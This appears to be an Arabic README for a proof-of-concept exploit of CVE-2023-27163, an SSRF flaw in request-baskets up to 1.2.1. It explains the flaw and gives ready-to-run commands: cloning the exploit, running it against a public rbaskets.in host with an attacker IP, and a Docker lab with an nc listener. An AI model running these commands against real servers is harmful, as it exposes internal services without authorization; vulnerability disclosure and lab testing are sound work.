
إثبات المفهوم لتزوير الطلب من جانب الخادم (SSRF) في request-baskets (V<= v.1.2.1)
يحتوي هذا المستودع على إثبات المفهوم (PoC) لـ CVE-2023-27163، وهي ثغرة من نوع تزوير الطلب من جانب الخادم (SSRF) تم اكتشافها في request-baskets حتى الإصدار 1.2.1. تسمح هذه الثغرة للمهاجمين بالوصول إلى موارد الشبكة والمعلومات الحساسة من خلال استغلال مكون /api/baskets/{name} عبر طلب API مُصمم.
git clone https://github.com/MasterCode112/CVE-2023-27163.git
bash ./CVE-2023-27163.sh https://rbaskets.in/ <attacker IP>
Request-baskets هو تطبيق ويب صُمم لجمع وتسجيل الطلبات على مسار معين، يُسمى basket. عند إنشائه، يمكن للمستخدم تحديد خادم آخر لإعادة توجيه الطلب. المشكلة هنا هي أن المستخدم يمكنه تحديد خدمات غير مقصودة، مثل التطبيقات المغلقة على الشبكة.
على سبيل المثال: لنفترض أن الخادم يستضيف Request-baskets (المنفذ 55555) وخادم Flask على المنفذ 8000. تم تكوين Flask للتفاعل فقط مع localhost. من خلال إنشاء basket يقوم بإعادة التوجيه إلى http://localhost:8000، يمكن للمهاجم الوصول إلى خادم Flask المقيد سابقًا.

docker run -p 55555:55555 darklynx/request-baskets:v1.2.1
git clone https://github.com/MasterCode112/CVE-2023-27163.git
nc -lvp 8000
DOCKER_IP=$(ifconfig docker0 | grep inet | head -n 1 | awk '{ print $2 }')
./CVE-2023-27163.sh http://127.0.0.1:55555/ http://$DOCKER_IP:8000/